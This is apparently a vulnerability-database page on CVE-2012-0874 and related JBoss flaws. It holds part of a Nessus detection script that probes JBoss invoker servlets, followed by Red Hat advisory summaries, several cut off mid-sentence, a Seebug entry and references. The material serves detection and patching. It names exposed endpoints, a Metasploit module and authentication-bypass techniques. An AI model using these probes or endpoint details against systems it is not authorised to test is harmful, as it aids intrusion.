script_set_attribute(attribute:"metasploit_name", value:'JBoss JMX Console Deployer Upload and Execute'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_exploithub", value:"true"); script_set_attribute(attribute:"exploithub_sku", value:"EH-13-606"); script_cwe_id(264); script_set_attribute(attribute:"vuln_publication_date", value:"2013/09/09"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/10/14"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:procurve_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:application_lifecycle_management"); script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:identity_driven_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_web_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_brms_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_enterprise_application_platform"); script_set_attribute(attribute:"cpe", value:"cpe:/a:jboss:jboss_application_server"); script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:workspace_streaming"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl"); script_require_ports("Services/www", 9111, 8080, 9832); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); # Identify possible ports. # # - web servers. ports = get_kb_list("Services/www"); if (isnull(ports)) ports = make_list(); # - ports for McAfee Web Reporter and Symantec Workspace Streaming. foreach p (make_list(8080, 9111, 9832)) { if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p); } # Check each port. non_vuln = make_list(); foreach port (ports) { vuln_urls = make_list(); foreach page (make_list("/EJBInvokerServlet", "/JMXInvokerServlet")) { url = "/invoker" + page; res = http_send_recv3( method : "GET", item : url, port : port, fetch404 : TRUE ); if ( !isnull(res) && "org.jboss.invocation.MarshalledValue" >< res[2] && ( 'WWW-Authenticate: Basic realm="JBoss HTTP Invoker"' >!< res[1] || "404 Not Found" >!< res[1] ) ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port)); } if (max_index(vuln_urls) > 0) { if (max_index(vuln_urls) > 1) request = "URLs"; else request = "URL"; if (report_verbosity > 0) { report = '\n' +'Nessus was able to verify the issue exists using the following '+ '\n' + request + ' :' + '\n' + '\n' + join(vuln_urls, sep:'\n') + '\n'; security_hole(port:port, extra:report); } else security_hole(port); } else non_vuln = make_list(non_vuln, port); } if (max_index(non_vuln) == 1) exit(0, "The web server tested on port " + port + " is not affected."); else if (max_index(non_vuln) > 1) exit(0, "None of the ports tested (" +join(non_vuln, sep:", ")+ ") contain web servers that are affected.");NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0193.NASL description Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2013-01-24 plugin id 64080 published 2013-01-24 reporter This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/64080 title RHEL 4 : JBoss EAP (RHSA-2013:0193) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0195.NASL description Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator# authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2014-11-08 plugin id 78945 published 2014-11-08 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78945 title RHEL 6 : JBoss EWP (RHSA-2013:0195) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0191.NASL description Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending '/j_security_check' to the end of a URL. (CVE-2012-3546) The JMX Console was vulnerable to CSRF attacks, allowing a remote attacker to hijack the authenticated JMX Console session of an administrator. (CVE-2011-2908) An XSS flaw allowed a remote attacker to perform an XSS attack against victims using the JMX Console. (CVE-2011-4575) SecurityAssociation.getCredential() returned the previous credential if no security context was provided. Depending on the deployed applications, this could possibly allow a remote attacker to hijack the credentials of a previously-authenticated user. (CVE-2012-3370) Configuring the JMX Invoker to restrict access to users with specific roles did not actually restrict access, allowing remote attackers with valid JMX Invoker credentials to perform JMX operations accessible to roles they are not a member of. (CVE-2012-5478) twiddle.sh accepted credentials as command line arguments, allowing local users to view them via a process listing. (CVE-2009-5066) NonManagedConnectionFactory logged the username and password in plain text when an exception was thrown. This could lead to the exposure of authentication credentials if local users had permissions to read the log file. (CVE-2012-0034) The JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets allow unauthenticated access by default in some profiles. The security interceptor's second layer of authentication prevented direct exploitation of this flaw. If the interceptor was misconfigured or inadvertently disabled, this flaw could lead to arbitrary code execution in the context of the user running the JBoss server. (CVE-2012-0874) The JGroups diagnostics service was enabled with no authentication when a JGroups channel was started, allowing attackers on the adjacent network to read diagnostic information. (CVE-2012-2377) CallerIdentityLoginModule retained the password from the previous call if a null password was provided. In non-default configurations this could possibly lead to a remote attacker hijacking a previously-authenticated user's session. (CVE-2012-3369) Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum for reporting CVE-2011-1096 and CVE-2011-2487; the Apache CXF project for reporting CVE-2012-2379; and Tyler Krpata for reporting CVE-2011-4575. CVE-2012-3370 and CVE-2012-3369 were discovered by Carlo de Wolf of Red Hat; CVE-2012-5478 discovered by Derek Horton of Red Hat; CVE-2012-0874 discovered by David Jorm of Red Hat; and CVE-2012-2377 was discovered by Red Hat. last seen 2017-10-29 modified 2014-05-02 plugin id 64078 published 2013-01-24 reporter Tenable source https://www.tenable.com/plugins/index.php?view=single&id=64078 title RHEL 6 : JBoss EAP (RHSA-2013:0191) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0197.NASL description Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 4. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator#authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2014-11-08 plugin id 78947 published 2014-11-08 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78947 title RHEL 4 : JBoss EWP (RHSA-2013:0197) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2013-0196.NASL description Updated JBoss Enterprise Web Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. This JBoss Enterprise Web Platform 5.2.0 release serves as a replacement for JBoss Enterprise Web Platform 5.1.2, and includes bug fixes and enhancements. As JBoss Enterprise Web Platform is a subset of JBoss Enterprise Application Platform, refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/ An attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096) JBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487) Spring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. Refer to the Solution section. (CVE-2011-2730) Apache CXF checked to ensure XML elements were signed or encrypted by a Supporting Token, but not whether the correct token was used. A remote attacker could transmit confidential information without the appropriate security, and potentially circumvent access controls on web services exposed via Apache CXF. Refer to the Solution section for details. (CVE-2012-2379) When an application used FORM authentication, along with another component that calls request.setUserPrincipal() before the call to FormAuthenticator# authenticate() (such as the Single-Sign-On valve), it was possible to bypass the security constraint checks in the FORM authenticator by appending last seen 2020-03-20 modified 2014-11-08 plugin id 78946 published 2014-11-08 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78946 title RHEL 5 : JBoss EWP (RHSA-2013:0196)
Redhat
| advisories |
| ||||||||||||||||||||||||||||||||||||||||
| rpms |
|
Seebug
| bulletinFamily | exploit |
| description | Bugtraq ID:57552 CVE ID:CVE-2012-0874 JBOSS是一个基于J2EE的开放源代码的应用服务器。 在某些配置下,允许对JMXInvokerHAServlet和EJBInvokerHAServlet invoker servlet进行未验证访问。安全拦截器第二层验证可防止直接利用此漏洞,但是如果拦截器错误配置或不正确禁用,可导致任意代码执行。 0 Red Hat JBoss Enterprise Web Platform for RHEL 5 Server 5 Red Hat JBoss Enterprise Web Platform for RHEL 4ES 5 Red Hat JBoss Enterprise Web Platform for RHEL 4AS 5 Red Hat JBoss Enterprise Application Platform for RHEL 5 Server 5 Red Hat JBoss Enterprise Application Platform for RHEL 4ES 5 Red Hat JBoss Enterprise Application Platform for RHEL 4AS 5 厂商解决方案 用户可参考如下厂商提供的安全公告获得补丁信息: http://rhn.redhat.com/errata/RHSA-2013-0194.html |
| id | SSV:60624 |
| last seen | 2017-11-19 |
| modified | 2013-02-03 |
| published | 2013-02-03 |
| reporter | Root |
| title | JBoss Enterprise Application Platform 多个安全绕过漏洞(CVE-2012-0874) |
References
- http://rhn.redhat.com/errata/RHSA-2013-0192.html
- http://rhn.redhat.com/errata/RHSA-2013-0194.html
- http://rhn.redhat.com/errata/RHSA-2013-0195.html
- http://www.securityfocus.com/bid/57552
- http://secunia.com/advisories/52054
- http://rhn.redhat.com/errata/RHSA-2013-0221.html
- http://securitytracker.com/id?1028042
- http://rhn.redhat.com/errata/RHSA-2013-0197.html
- http://rhn.redhat.com/errata/RHSA-2013-0196.html
- http://rhn.redhat.com/errata/RHSA-2013-0193.html
- http://rhn.redhat.com/errata/RHSA-2013-0198.html
- http://rhn.redhat.com/errata/RHSA-2013-0191.html
- https://bugzilla.redhat.com/show_bug.cgi?id=795645
- http://secunia.com/advisories/51984
- http://www.exploit-db.com/exploits/30211
- http://archives.neohapsis.com/archives/bugtraq/2013-12/0134.html
- http://rhn.redhat.com/errata/RHSA-2013-0533.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/81511